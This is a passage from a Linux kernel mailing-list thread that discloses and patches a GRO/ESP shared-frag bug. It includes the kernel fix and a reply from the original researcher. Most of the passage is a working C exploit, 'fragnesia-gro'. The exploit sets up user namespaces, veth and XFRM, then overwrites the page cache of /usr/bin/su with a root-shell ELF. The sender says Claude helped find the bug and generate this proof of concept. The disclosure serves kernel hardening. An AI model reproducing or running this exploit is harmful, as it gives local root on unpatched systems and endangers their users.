sync_write(p_rdy[1]); pause(); _exit(0); } close(p_ns[1]); close(p_veth[0]); close(p_rdy[1]); sync_read(p_ns[0]); close(p_ns[0]); move_to_netns(VETH1, rx); sync_write(p_veth[1]); close(p_veth[1]); if_up(VETH0); add_addr(VETH0, ADDR_SRC); ethtool_set(VETH0, ETHTOOL_STSO, 0); ethtool_set(VETH0, ETHTOOL_SGSO, 0); /* * Add a 
netem delay on the sender veth so both datagrams sit in the * qdisc until the timer fires, then get released into veth_xmit() * within the same softirq context. This guarantees both land in one * NAPI poll cycle for GRO to merge them, without needing sysfs * gro_flush_timeout (which requires capable(CAP_NET_ADMIN) in the * init namespace). tc uses netlink with ns_capable(), so it works * from a user namespace. */ if (system("tc qdisc add dev " VETH0 " root netem delay 20ms") != 0) gate_fail("tc netem"); usleep(50000); sync_read(p_rdy[0]); close(p_rdy[0]); int sock = socket(AF_INET, SOCK_DGRAM | SOCK_CLOEXEC, 0); if (sock < 0) die("socket"); struct sockaddr_in sa = { .sin_family = AF_INET, .sin_port = htons(UDP_PORT) }; struct sockaddr_in da = { .sin_family = AF_INET, .sin_port = htons(UDP_PORT) }; inet_pton(AF_INET, ADDR_SRC, &sa.sin_addr); inet_pton(AF_INET, ADDR_DST, &da.sin_addr); bind(sock, (struct sockaddr *)&sa, sizeof(sa)); connect(sock, (struct sockaddr *)&da, sizeof(da)); int target_fd = open(target_file, O_RDONLY | O_CLOEXEC); if (target_fd < 0) die("open target"); uint32_t seq = 1; size_t total_changed = 0; int delay_ms = 20; int sleep_us = 40000; struct timespec last_ok; clock_gettime(CLOCK_MONOTONIC, &last_ok); printf("[*] replacing %d bytes starting at offset 0\n", PAYLOAD_LEN); /* Warmup: send a dummy pair to prime the netem/NAPI path */ { unsigned char w[16 + SPLICE_LEN]; memset(w, 0, sizeof(w)); store_be32(w, ESP_SPI); store_be32(w + 4, seq++); send(sock, w, sizeof(w), 0); store_be32(w + 4, seq++); send(sock, w, sizeof(w), 0); usleep(sleep_us); } for (int pass = 0; ; pass++) { size_t pass_changed = 0, remaining = 0; for (int idx = 0; idx < PAYLOAD_LEN; idx++) { unsigned char cur = read_byte_at(target_fd, idx); if (cur == shell_elf[idx]) continue; remaining++; unsigned char need_ks = cur ^ shell_elf[idx]; uint16_t nonce = stream_nonce[need_ks]; unsigned char iv[8]; memset(iv, 0xcc, sizeof(iv)); store_be32(iv + 4, nonce); unsigned char hdr[16]; char 
hp[] = "/tmp/fgro-XXXXXX"; int hfd = mkstemp(hp); unlink(hp); store_be32(hdr, ESP_SPI); store_be32(hdr + 4, seq++); memcpy(hdr + 8, iv, 8); write(hfd, hdr, 16); int pfd[2]; pipe(pfd); loff_t ho = 0; splice(hfd, &ho, pfd[1], NULL, 16, 0); loff_t so = (loff_t)idx; splice(target_fd, &so, pfd[1], NULL, SPLICE_LEN, 0); close(hfd); unsigned char p1[16 + SPLICE_LEN]; store_be32(p1, ESP_SPI); store_be32(p1 + 4, seq++); memcpy(p1 + 8, iv, 8); memset(p1 + 16, 0x41, SPLICE_LEN); send(sock, p1, sizeof(p1), 0); int cork = 1; setsockopt(sock, IPPROTO_UDP, UDP_CORK, &cork, sizeof(cork)); splice(pfd[0], NULL, sock, NULL, 16 + SPLICE_LEN, 0); cork = 0; setsockopt(sock, IPPROTO_UDP, UDP_CORK, &cork, sizeof(cork)); close(pfd[0]); close(pfd[1]); usleep(sleep_us); unsigned char got = read_byte_at(target_fd, idx); if (got == shell_elf[idx]) { total_changed++; pass_changed++; clock_gettime(CLOCK_MONOTONIC, &last_ok); printf("\r[+] byte %3d/%-3d 0x%02x -> 0x%02x ok (%zu changed)", idx, PAYLOAD_LEN, cur, got, total_changed); } else { printf("\r[-] byte %3d/%-3d 0x%02x -> 0x%02x (want 0x%02x) MISS", idx, PAYLOAD_LEN, cur, got, shell_elf[idx]); } fflush(stdout); } if (remaining == 0) break; size_t still_wrong = 0; for (int idx = 0; idx < PAYLOAD_LEN; idx++) if (read_byte_at(target_fd, idx) != shell_elf[idx]) still_wrong++; if (still_wrong == 0) break; struct timespec now; clock_gettime(CLOCK_MONOTONIC, &now); long elapsed = (now.tv_sec - last_ok.tv_sec) * 1000 + (now.tv_nsec - last_ok.tv_nsec) / 1000000; if (elapsed > 30000) { printf("\n[!] %zu bytes stuck after 30s without progress\n", still_wrong); break; } if (delay_ms < 500) { delay_ms = delay_ms < 250 ? 
delay_ms * 2 : 500; sleep_us = delay_ms * 2000; char cmd[128]; snprintf(cmd, sizeof(cmd), "tc qdisc change dev " VETH0 " root netem delay %dms", delay_ms); system(cmd); } printf("\n[*] pass %d: %zu ok, %zu still wrong, delay now %dms, retrying\n", pass + 1, pass_changed, still_wrong, delay_ms); fflush(stdout); } close(target_fd); close(sock); kill(rx, SIGTERM); waitpid(rx, NULL, 0); /* Final verification: count how many bytes match shell_elf */ int final_fd = open(target_file, O_RDONLY | O_CLOEXEC); size_t matching = 0; if (final_fd >= 0) { for (int i = 0; i < PAYLOAD_LEN; i++) if (read_byte_at(final_fd, i) == shell_elf[i]) matching++; close(final_fd); } printf("\n\n"); if (total_changed > 0) { printf("VULNERABLE: %zu/%d payload bytes now match shell_elf " "(%zu written via GRO flag-strip)\n", matching, PAYLOAD_LEN, total_changed); _exit(1); } printf("FIXED: 0/%d bytes changed\n", PAYLOAD_LEN); _exit(0); } [-- Attachment #3: 0001-net-gro-propagate-SKBFL_SHARED_FRAG-in-skb_gro_recei.patch --] [-- Type: text/plain, Size: 3337 bytes --] From c3ec785f197bf329c443aa547eb70864e2ef29ac Mon Sep 17 00:00:00 2001 From: Sultan Alsawaf <sultan@kerneltoast.com> Date: Wed, 13 May 2026 21:47:51 -0700 Subject: [PATCH] net: gro: propagate SKBFL_SHARED_FRAG in skb_gro_receive() skb_gro_receive() moves frag descriptors from the incoming skb to the GRO accumulator through two frag-transfer paths (the direct frag-move loop and the head_frag + memcpy path) without propagating the SKBFL_SHARED_FRAG flag from the incoming skb's shinfo->flags. As a result, the accumulator ends up holding references to externally owned or page-cache-backed pages while reporting skb_has_shared_frag() as false. This is the same bug class as CVE-2026-46300 (d8cfbcdd07557, "net: skbuff: propagate shared-frag marker through frag-transfer helpers"), which fixed the identical omission in __pskb_copy_fclone(), skb_try_coalesce(), and skb_shift(). 
skb_gro_receive() was missed in that fix since it lives in net/core/gro.c rather than net/core/skbuff.c. The impact is observable through ESP-over-UDP with UDP GRO: splice() attaches page-cache pages to a UDP skb, setting SKBFL_SHARED_FRAG via ip_append_page(). When two such datagrams are GRO-merged via skb_gro_receive(), the flag is dropped. After udp_rcv_segment() re-segments the merged GSO skb, the fresh segments carry the page-cache frags without the shared-frag marker. esp_input() then sees !skb_cloned() && !skb_has_shared_frag() and takes the skip_cow fast path, decrypting in place over the page-cache pages. Because AES-GCM CTR decryption runs before the authentication tag is verified, the page cache is corrupted even though the tag check subsequently fails. Fix it by propagating SKBFL_SHARED_FRAG from the incoming skb to the accumulator in both frag-transfer paths, matching what the skbuff.c helpers already do. The third path (frag_list merge at the "merge:" label) chains the entire incoming skb onto the accumulator's frag_list without moving individual frag descriptors, so each sub-skb retains its own flags and no propagation is needed there. 
Fixes: cef401de7be8 ("net: fix possible wrong checksum generation") Fixes: f4c50a4034e6 ("xfrm: esp: avoid in-place decrypt on shared skb frags") Cc: stable@vger.kernel.org Co-authored-by: Claude Opus 4.6 (1M context) <noreply@anthropic.com> Signed-off-by: Sultan Alsawaf <sultan@kerneltoast.com> --- net/core/gro.c | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/net/core/gro.c b/net/core/gro.c index 31d21de5b15a7..4ac41ced13aeb 100644 --- a/net/core/gro.c +++ b/net/core/gro.c @@ -145,6 +145,8 @@ int skb_gro_receive(struct sk_buff *p, struct sk_buff *skb) skb_frag_off_add(frag, offset); skb_frag_size_sub(frag, offset); + pinfo->flags |= skbinfo->flags & SKBFL_SHARED_FRAG; + /* all fragments truesize : remove (head size + sk_buff) */ new_truesize = SKB_TRUESIZE(skb_end_offset(skb)); delta_truesize = skb->truesize - new_truesize; @@ -176,6 +178,8 @@ int skb_gro_receive(struct sk_buff *p, struct sk_buff *skb) memcpy(frag + 1, skbinfo->frags, sizeof(*frag) * skbinfo->nr_frags); /* We dont need to clear skbinfo->nr_frags here */ + pinfo->flags |= skbinfo->flags & SKBFL_SHARED_FRAG; + new_truesize = SKB_DATA_ALIGN(sizeof(struct sk_buff)); delta_truesize = skb->truesize - new_truesize; skb->truesize = new_truesize; -- 2.54.0 ^ permalink raw reply related [flat|nested] 6+ messages in thread
* Re: [PATCH net v2] net: skbuff: propagate shared-frag marker through frag-transfer helpers
2026-05-14 6:18 ` Sultan Alsawaf
@ 2026-05-14 9:23 ` Hyunwoo Kim
0 siblings, 0 replies; 6+ messages in thread
From: Hyunwoo Kim @ 2026-05-14 9:23 UTC (permalink / raw)
To: Sultan Alsawaf
Cc: davem, edumazet, kuba, pabeni, horms, kerneljasonxing, kuniyu,
mhal, jiayuan.chen, steffen.klassert, vakzz, ben, herbert,
dsahern, netdev, stable, imv4bel

On Wed, May 13, 2026 at 11:18:10PM -0700, Sultan Alsawaf wrote:
> On Thu, May 14, 2026 at 06:07:44AM +0900, Hyunwoo Kim wrote:
> > Changes in v2:
> > - Also propagate SHARED_FRAG in skb_shift()
> > - v1: https://lore.kernel.org/all/agRfuVOeMI5pbHhY@v4bel/
>
> Hi Hyunwoo,
>
> I've been working on mitigating this vulnerability as a member of the kernel
> team at CIQ, a distro vendor. In particular, we wanted to make sure that there
> weren't any lingering places missing SHARED_FRAG propagation.
>
> To that end, I used Claude to discover that skb_gro_receive() remained unpatched
> (as you pointed out in the v1 thread). And then I generated a PoC exploiting the
> vulnerable skb_gro_receive() path.
>
> The PoC is a modified version of the original fragnesia PoC. It works 100% of
> the time, just like the original fragnesia PoC.
>
> I have attached the PoC and a patch that fixes skb_gro_receive(). Please take a
> look at them.
>
> Thanks,
> Sultan

Nice catch. Thank you.

After testing, I plan to merge your patch with v2 into a single patch
(not a series) and submit it as v3. I would appreciate it if you could
then add an appropriate credit tag of your own.

Also, I would appreciate it if you could use AI to explore additional
propagation variant paths. From my own analysis, no further ones have
been identified.

Best regards, Hyunwoo Kim > /* > * fragnesia-gro.c: skb_gro_receive() SKBFL_SHARED_FRAG page-cache corruption PoC > * > * Drop-in replacement for the espintcp fragnesia variant, targeting the same > * bug class (CVE-2026-46300) through the GRO frag-merge path instead of the > * espintcp path. Copies shell_elf over /usr/bin/su's page cache the same way > * the original fragnesia does. > * > * The exploit splices 17 bytes per round (1 byte ciphertext + 16 byte ICV) so > * each ESP decrypt corrupts exactly ONE target byte with no collateral damage. > * A precomputed IV table selects the AES-GCM keystream byte that XORs the > * current file content to the desired shell_elf byte. > * > * Based on the Fragnesia PoC by William Bowling / Hyunwoo Kim. > * > * Build: > * gcc -O2 -Wall -Wextra -static fragnesia-gro.c -o fragnesia-gro > * > * Run (as root): > * ./fragnesia-gro > * > * Exit codes: > * 1: vulnerable (page cache mutated through GRO flag-strip path) > * 0: fixed (byte unchanged) > * 2: local setup or argument error > * 4: namespace/veth gate closed > */ > > #define _GNU_SOURCE > > #include <arpa/inet.h> > #include <errno.h> > #include <fcntl.h> > #include <limits.h> > #include <net/if.h> > #include <netinet/in.h> > #include <sched.h> > #include <signal.h> > #include <stdbool.h> > #include <stdint.h> > #include <stdio.h> > #include <stdlib.h> > #include <string.h> > #include <sys/ioctl.h> > #include <sys/mount.h> > #include <sys/socket.h> > #include <sys/stat.h> > #include <sys/syscall.h> > #include <sys/types.h> > #include <time.h> > #include <sys/wait.h> > #include <unistd.h> > #include <linux/bpf.h> > #include <linux/if_addr.h> > #include <linux/if_alg.h> > #include <linux/netlink.h> > #include <linux/xfrm.h> > > /* ---- compat defines ---- */ > > #ifndef NLA_ALIGNTO > #define NLA_ALIGNTO 4 > #endif > #define NLA_ALIGN(len) (((len) + NLA_ALIGNTO - 1) & ~(NLA_ALIGNTO - 1)) > #ifndef NLA_HDRLEN > #define NLA_HDRLEN ((int)NLA_ALIGN(sizeof(struct nlattr))) > #endif 
> #ifndef RTM_NEWLINK > #define RTM_NEWLINK 16 > #endif > #ifndef RTM_NEWADDR > #define RTM_NEWADDR 20 > #endif > #ifndef NETLINK_ROUTE > #define NETLINK_ROUTE 0 > #endif > #ifndef NETLINK_XFRM > #define NETLINK_XFRM 6 > #endif > #ifndef IFLA_IFNAME > #define IFLA_IFNAME 3 > #endif > #ifndef IFLA_LINKINFO > #define IFLA_LINKINFO 18 > #endif > #ifndef IFLA_INFO_KIND > #define IFLA_INFO_KIND 1 > #endif > #ifndef IFLA_INFO_DATA > #define IFLA_INFO_DATA 2 > #endif > #ifndef VETH_INFO_PEER > #define VETH_INFO_PEER 1 > #endif > #ifndef IFLA_NET_NS_PID > #define IFLA_NET_NS_PID 19 > #endif > #ifndef IFA_LOCAL > #define IFA_LOCAL 2 > #endif > #ifndef IFA_ADDRESS > #define IFA_ADDRESS 1 > #endif > #ifndef NLA_F_NESTED > #define NLA_F_NESTED (1 << 15) > #endif > #ifndef ETHTOOL_SGRO > #define ETHTOOL_SGRO 0x0000002c > #endif > #ifndef ETHTOOL_STSO > #define ETHTOOL_STSO 0x0000001f > #endif > #ifndef ETHTOOL_SGSO > #define ETHTOOL_SGSO 0x00000024 > #endif > #ifndef SIOCETHTOOL > #define SIOCETHTOOL 0x8946 > #endif > #ifndef UDP_ENCAP > #define UDP_ENCAP 100 > #endif > #ifndef UDP_ENCAP_ESPINUDP > #define UDP_ENCAP_ESPINUDP 2 > #endif > #ifndef UDP_GRO > #define UDP_GRO 104 > #endif > #ifndef UDP_CORK > #define UDP_CORK 1 > #endif > #ifndef AF_ALG > #define AF_ALG 38 > #endif > #ifndef SOL_ALG > #define SOL_ALG 279 > #endif > #ifndef ALG_SET_KEY > #define ALG_SET_KEY 1 > #endif > #ifndef ALG_SET_OP > #define ALG_SET_OP 3 > #endif > #ifndef ALG_OP_ENCRYPT > #define ALG_OP_ENCRYPT 1 > #endif > #ifndef IFLA_XDP > #define IFLA_XDP 43 > #endif > #ifndef IFLA_XDP_FD > #define IFLA_XDP_FD 1 > #endif > #ifndef IFLA_XDP_FLAGS > #define IFLA_XDP_FLAGS 3 > #endif > #ifndef XDP_FLAGS_SKB_MODE > #define XDP_FLAGS_SKB_MODE (1U << 1) > #endif > > struct rtnl_ifinfomsg { > unsigned char ifi_family; > unsigned char __ifi_pad; > unsigned short ifi_type; > int ifi_index; > unsigned int ifi_flags; > unsigned int ifi_change; > }; > > /* ---- constants ---- */ > > #define VETH0 "veth0" > #define 
VETH1 "veth1" > #define ADDR_SRC "10.0.0.1" > #define ADDR_DST "10.0.0.2" > #define UDP_PORT 4500 > #define ESP_SPI 0x100 > #define ICV_LEN 16 > #define PAYLOAD_LEN 192 > /* > * Splice exactly 17 bytes per round: rfc4106 shifts the 8-byte IV into > * the AAD, so the inner GCM sees SPLICE_LEN bytes of ciphertext. With > * SPLICE_LEN - ICV_LEN = 1, exactly one frag byte is decrypted. > */ > #define SPLICE_LEN (1 + ICV_LEN) > > static const unsigned char xfrm_key[20] = { > 0x00, 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, > 0x88, 0x99, 0xaa, 0xbb, 0xcc, 0xdd, 0xee, 0xff, > 0x01, 0x02, 0x03, 0x04 > }; > > static const uint8_t shell_elf[PAYLOAD_LEN] = { > 0x7f,0x45,0x4c,0x46,0x02,0x01,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, > 0x02,0x00,0x3e,0x00,0x01,0x00,0x00,0x00,0x78,0x00,0x40,0x00,0x00,0x00,0x00,0x00, > 0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, > 0x00,0x00,0x00,0x00,0x40,0x00,0x38,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00, > 0x01,0x00,0x00,0x00,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, > 0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00, > 0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00, > 0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x31,0xff,0x31,0xf6,0x31,0xc0,0xb0,0x6a, > 0x0f,0x05,0xb0,0x69,0x0f,0x05,0xb0,0x74,0x0f,0x05,0x6a,0x00,0x48,0x8d,0x05,0x12, > 0x00,0x00,0x00,0x50,0x48,0x89,0xe2,0x48,0x8d,0x3d,0x12,0x00,0x00,0x00,0x31,0xf6, > 0x6a,0x3b,0x58,0x0f,0x05,0x54,0x45,0x52,0x4d,0x3d,0x78,0x74,0x65,0x72,0x6d,0x00, > 0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, > }; > > static const char *target_file = "/usr/bin/su"; > > /* ---- utility ---- */ > > static void die(const char *w) { fprintf(stderr, "%s: %s\n", w, strerror(errno)); exit(2); } > static void gate_fail(const char *w) { fprintf(stderr, "gate_closed: %s: %s\n", w, strerror(errno)); exit(4); } > > static void store_be32(unsigned char *p, 
uint32_t v) > { > p[0] = v >> 24; p[1] = v >> 16; p[2] = v >> 8; p[3] = v; > } > > static void sync_write(int fd) { unsigned char b = 1; if (write(fd, &b, 1) != 1) die("sync_write"); } > static void sync_read(int fd) { unsigned char b; if (read(fd, &b, 1) != 1) die("sync_read"); } > > static unsigned char read_byte_at(int fd, off_t off) > { > unsigned char b; > if (pread(fd, &b, 1, off) != 1) die("pread"); > return b; > } > > /* ---- netlink helpers ---- */ > > static int nl_ack_errno(char *buf, ssize_t len) > { > struct nlmsghdr *nlh; > for (nlh = (struct nlmsghdr *)buf; NLMSG_OK(nlh, (unsigned int)len); > nlh = NLMSG_NEXT(nlh, len)) { > if (nlh->nlmsg_type == NLMSG_ERROR) { > struct nlmsgerr *e = (struct nlmsgerr *)NLMSG_DATA(nlh); > if (e->error == 0) return 0; > errno = -e->error; > return -1; > } > } > errno = EPROTO; > return -1; > } > > static void add_nlattr(struct nlmsghdr *nlh, size_t max, > unsigned short type, const void *data, size_t len) > { > size_t off = NLMSG_ALIGN(nlh->nlmsg_len); > struct nlattr *nla = (struct nlattr *)((char *)nlh + off); > if (off + NLA_HDRLEN + len > max) { fprintf(stderr, "nlmsg overflow\n"); exit(2); } > nla->nla_type = type; > nla->nla_len = NLA_HDRLEN + len; > memcpy((char *)nla + NLA_HDRLEN, data, len); > nlh->nlmsg_len = off + NLA_ALIGN(nla->nla_len); > } > > static struct nlattr *nest_begin(struct nlmsghdr *nlh, size_t max, unsigned short type) > { > size_t off = NLMSG_ALIGN(nlh->nlmsg_len); > struct nlattr *nla = (struct nlattr *)((char *)nlh + off); > if (off + NLA_HDRLEN > max) { fprintf(stderr, "nlmsg overflow\n"); exit(2); } > nla->nla_type = type; > nla->nla_len = NLA_HDRLEN; > nlh->nlmsg_len = off + NLA_HDRLEN; > return nla; > } > > static void nest_end(struct nlmsghdr *nlh, struct nlattr *nla) > { > nla->nla_len = (unsigned short)((char *)nlh + NLMSG_ALIGN(nlh->nlmsg_len) - (char *)nla); > } > > static void nl_talk(struct nlmsghdr *nlh, int proto, const char *label) > { > struct sockaddr_nl sa = { .nl_family = 
AF_NETLINK }; > char resp[4096]; > int fd = socket(AF_NETLINK, SOCK_RAW | SOCK_CLOEXEC, proto); > if (fd < 0) gate_fail(label); > if (bind(fd, (struct sockaddr *)&sa, sizeof(sa)) < 0) gate_fail(label); > memset(&sa, 0, sizeof(sa)); > sa.nl_family = AF_NETLINK; > if (sendto(fd, nlh, nlh->nlmsg_len, 0, (struct sockaddr *)&sa, sizeof(sa)) < 0) gate_fail(label); > ssize_t r = recv(fd, resp, sizeof(resp), 0); > if (r < 0 || nl_ack_errno(resp, r) < 0) gate_fail(label); > close(fd); > } > > /* ---- network setup ---- */ > > static void if_up(const char *name) > { > struct ifreq ifr = {}; > int fd = socket(AF_INET, SOCK_DGRAM | SOCK_CLOEXEC, 0); > if (fd < 0) gate_fail("socket"); > strncpy(ifr.ifr_name, name, IFNAMSIZ - 1); > if (ioctl(fd, SIOCGIFFLAGS, &ifr) < 0) gate_fail(name); > ifr.ifr_flags |= IFF_UP; > if (ioctl(fd, SIOCSIFFLAGS, &ifr) < 0) gate_fail(name); > close(fd); > } > > static void create_veth(void) > { > char buf[4096] = {}; > struct nlmsghdr *nlh = (struct nlmsghdr *)buf; > nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct rtnl_ifinfomsg)); > nlh->nlmsg_type = RTM_NEWLINK; > nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE | NLM_F_EXCL; > ((struct rtnl_ifinfomsg *)NLMSG_DATA(nlh))->ifi_family = AF_UNSPEC; > add_nlattr(nlh, sizeof(buf), IFLA_IFNAME, VETH0, strlen(VETH0) + 1); > struct nlattr *li = nest_begin(nlh, sizeof(buf), IFLA_LINKINFO | NLA_F_NESTED); > add_nlattr(nlh, sizeof(buf), IFLA_INFO_KIND, "veth", 5); > struct nlattr *id = nest_begin(nlh, sizeof(buf), IFLA_INFO_DATA | NLA_F_NESTED); > struct nlattr *pn = nest_begin(nlh, sizeof(buf), VETH_INFO_PEER | NLA_F_NESTED); > { size_t o = NLMSG_ALIGN(nlh->nlmsg_len); > memset((char *)nlh + o, 0, sizeof(struct rtnl_ifinfomsg)); > nlh->nlmsg_len = o + sizeof(struct rtnl_ifinfomsg); } > add_nlattr(nlh, sizeof(buf), IFLA_IFNAME, VETH1, strlen(VETH1) + 1); > nest_end(nlh, pn); nest_end(nlh, id); nest_end(nlh, li); > nl_talk(nlh, NETLINK_ROUTE, "create veth"); > } > > static void move_to_netns(const char 
*name, pid_t pid) > { > char buf[4096] = {}; > struct nlmsghdr *nlh = (struct nlmsghdr *)buf; > uint32_t ns_pid = (uint32_t)pid; > unsigned int idx = if_nametoindex(name); > if (!idx) gate_fail("if_nametoindex"); > nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct rtnl_ifinfomsg)); > nlh->nlmsg_type = RTM_NEWLINK; > nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; > ((struct rtnl_ifinfomsg *)NLMSG_DATA(nlh))->ifi_family = AF_UNSPEC; > ((struct rtnl_ifinfomsg *)NLMSG_DATA(nlh))->ifi_index = (int)idx; > add_nlattr(nlh, sizeof(buf), IFLA_NET_NS_PID, &ns_pid, sizeof(ns_pid)); > nl_talk(nlh, NETLINK_ROUTE, "move veth"); > } > > static void add_addr(const char *name, const char *addr) > { > char buf[4096] = {}; > struct nlmsghdr *nlh = (struct nlmsghdr *)buf; > struct in_addr a; > unsigned int idx = if_nametoindex(name); > if (!idx) gate_fail("if_nametoindex"); > inet_pton(AF_INET, addr, &a); > nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct ifaddrmsg)); > nlh->nlmsg_type = RTM_NEWADDR; > nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE | NLM_F_EXCL; > struct ifaddrmsg *ifa = (struct ifaddrmsg *)NLMSG_DATA(nlh); > ifa->ifa_family = AF_INET; > ifa->ifa_prefixlen = 24; > ifa->ifa_index = idx; > add_nlattr(nlh, sizeof(buf), IFA_LOCAL, &a, sizeof(a)); > add_nlattr(nlh, sizeof(buf), IFA_ADDRESS, &a, sizeof(a)); > nl_talk(nlh, NETLINK_ROUTE, "add addr"); > } > > static void ethtool_set(const char *name, uint32_t cmd, uint32_t data) > { > struct ifreq ifr = {}; > struct { uint32_t cmd; uint32_t data; } val = { cmd, data }; > int fd = socket(AF_INET, SOCK_DGRAM | SOCK_CLOEXEC, 0); > if (fd < 0) return; > strncpy(ifr.ifr_name, name, IFNAMSIZ - 1); > ifr.ifr_data = (void *)&val; > ioctl(fd, SIOCETHTOOL, &ifr); > close(fd); > } > > /* ---- XDP attach/detach for NAPI init ---- */ > > static void xdp_toggle(const char *name, int prog_fd, uint32_t flags) > { > char buf[4096] = {}; > struct nlmsghdr *nlh = (struct nlmsghdr *)buf; > unsigned int idx = if_nametoindex(name); > if (!idx) 
return; > nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct rtnl_ifinfomsg)); > nlh->nlmsg_type = RTM_NEWLINK; > nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; > ((struct rtnl_ifinfomsg *)NLMSG_DATA(nlh))->ifi_family = AF_UNSPEC; > ((struct rtnl_ifinfomsg *)NLMSG_DATA(nlh))->ifi_index = (int)idx; > struct nlattr *x = nest_begin(nlh, sizeof(buf), IFLA_XDP | NLA_F_NESTED); > add_nlattr(nlh, sizeof(buf), IFLA_XDP_FD, &prog_fd, sizeof(prog_fd)); > add_nlattr(nlh, sizeof(buf), IFLA_XDP_FLAGS, &flags, sizeof(flags)); > nest_end(nlh, x); > nl_talk(nlh, NETLINK_ROUTE, "xdp"); > } > > static void enable_veth_napi(const char *name) > { > struct bpf_insn { uint8_t code; uint8_t regs; int16_t off; int32_t imm; }; > struct bpf_insn prog[] = { { 0xb7, 0, 0, 2 }, { 0x95, 0, 0, 0 } }; > struct { uint32_t t; uint32_t c; uint64_t i; uint64_t l; > uint32_t a,b; uint64_t d; uint32_t e,f; char n[16]; } attr = {}; > static const char lic[] = "GPL"; > attr.t = 6; attr.c = 2; > attr.i = (uint64_t)(unsigned long)prog; > attr.l = (uint64_t)(unsigned long)lic; > int fd = (int)syscall(__NR_bpf, 5, &attr, sizeof(attr)); > if (fd < 0) return; > xdp_toggle(name, fd, XDP_FLAGS_SKB_MODE); > close(fd); > int m1 = -1; > xdp_toggle(name, m1, XDP_FLAGS_SKB_MODE); > } > > /* ---- user namespace ---- */ > > static void setup_userns(void) > { > uid_t uid = getuid(); > gid_t gid = getgid(); > int rp[2], mp[2]; > if (pipe(rp) < 0 || pipe(mp) < 0) die("pipe"); > pid_t c = fork(); > if (c < 0) die("fork"); > if (c == 0) { > char path[64], map[64]; pid_t pp = getppid(); > close(rp[1]); close(mp[0]); sync_read(rp[0]); > snprintf(path, sizeof(path), "/proc/%d/setgroups", pp); > int fd = open(path, O_WRONLY); if (fd >= 0) { write(fd, "deny", 4); close(fd); } > snprintf(path, sizeof(path), "/proc/%d/uid_map", pp); > snprintf(map, sizeof(map), "0 %u 1\n", uid); > fd = open(path, O_WRONLY); if (fd >= 0) { write(fd, map, strlen(map)); close(fd); } > snprintf(path, sizeof(path), "/proc/%d/gid_map", pp); > snprintf(map, 
sizeof(map), "0 %u 1\n", gid); > fd = open(path, O_WRONLY); if (fd >= 0) { write(fd, map, strlen(map)); close(fd); } > sync_write(mp[1]); _exit(0); > } > close(rp[0]); close(mp[1]); > if (unshare(CLONE_NEWUSER) < 0) gate_fail("unshare(CLONE_NEWUSER)"); > sync_write(rp[1]); sync_read(mp[0]); waitpid(c, NULL, 0); > setresgid(0, 0, 0); setresuid(0, 0, 0); > } > > /* ---- XFRM SA ---- */ > > static void add_sa(void) > { > char buf[4096] = {}; > char ab[sizeof(struct xfrm_algo_aead) + sizeof(xfrm_key)]; > struct nlmsghdr *nlh = (struct nlmsghdr *)buf; > nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct xfrm_usersa_info)); > nlh->nlmsg_type = XFRM_MSG_NEWSA; > nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; > struct xfrm_usersa_info *xs = (struct xfrm_usersa_info *)NLMSG_DATA(nlh); > xs->sel.family = AF_INET; > inet_pton(AF_INET, ADDR_SRC, &xs->saddr.a4); > inet_pton(AF_INET, ADDR_DST, &xs->id.daddr.a4); > xs->id.spi = htonl(ESP_SPI); xs->id.proto = IPPROTO_ESP; > xs->family = AF_INET; xs->mode = XFRM_MODE_TRANSPORT; xs->replay_window = 0; > xs->lft.soft_byte_limit = xs->lft.hard_byte_limit = XFRM_INF; > xs->lft.soft_packet_limit = xs->lft.hard_packet_limit = XFRM_INF; > memset(ab, 0, sizeof(ab)); > struct xfrm_algo_aead *a = (struct xfrm_algo_aead *)ab; > strcpy(a->alg_name, "rfc4106(gcm(aes))"); > a->alg_key_len = sizeof(xfrm_key) * 8; > a->alg_icv_len = ICV_LEN * 8; > memcpy(a->alg_key, xfrm_key, sizeof(xfrm_key)); > add_nlattr(nlh, sizeof(buf), XFRMA_ALG_AEAD, ab, sizeof(ab)); > struct xfrm_encap_tmpl encap = {}; > encap.encap_type = UDP_ENCAP_ESPINUDP; > encap.encap_sport = htons(UDP_PORT); > encap.encap_dport = htons(UDP_PORT); > add_nlattr(nlh, sizeof(buf), XFRMA_ENCAP, &encap, sizeof(encap)); > nl_talk(nlh, NETLINK_XFRM, "add SA"); > } > > /* ---- AES-GCM keystream ---- */ > > static void aes_ecb_block(int alg_fd, const unsigned char in[16], unsigned char out[16]) > { > char cb[CMSG_SPACE(sizeof(uint32_t))] = {}; > struct iovec iov = { (void *)in, 16 }; > struct msghdr 
